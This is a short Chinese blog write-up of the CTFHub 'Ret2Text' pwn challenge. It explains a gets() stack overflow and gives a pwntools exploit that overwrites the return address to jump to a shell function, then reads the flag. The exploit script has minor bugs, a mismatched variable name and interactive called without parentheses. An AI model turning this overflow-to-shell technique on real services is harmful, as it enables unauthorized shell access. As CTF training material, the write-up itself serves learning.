0
点赞
收藏
分享

微信扫一扫

CTFHUB(PWN)Ret2Text

程序小小黑 2022-02-02 阅读 95
安全pwn

首先检查保护机制 checksec

64 位 + 什么保护都没开

然后放到ida64中查看

发现gets函数,没有限制数据的长度,容易发生栈溢出

shift+F12 找到bin_sh函数地址

64位程序直接读取偏移量

构造payload,编写exp

from pwn import*
p=remote("ip",端口)
binsh_addr=地址
payload='a'*(0x70+8)+p64(bin_sh)
p.sendline(payload)
p.interactive

连接成功后ls

cat flag

举报

相关推荐

pwn ret2text

下载地址f5反汇编编程语言

【PWN刷题__ret2text】[CISCN 2019华北]PWN1

pythonprewittsobellaplace

pwn刷题num32----ret2text

系统安全网络安全c语言安全python

【PWN · ret2libc】[CISCN 2019东北]PWN2

bug单片机stm32c语言

2022 starctf pwn ret2school

安全

pwn基本ROP——ret2syscall

网络安全系统安全

[pwn] 5.ROP-ret2libc

系统安全web安全安全system函数linux系统/运维

[CTFHub]ret2text-入土为安的第十二天

redis分布式数据库javac++后端架构

CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用

安全

BUUCTF Pwn pwn2_sctf_2016

安全
0 条评论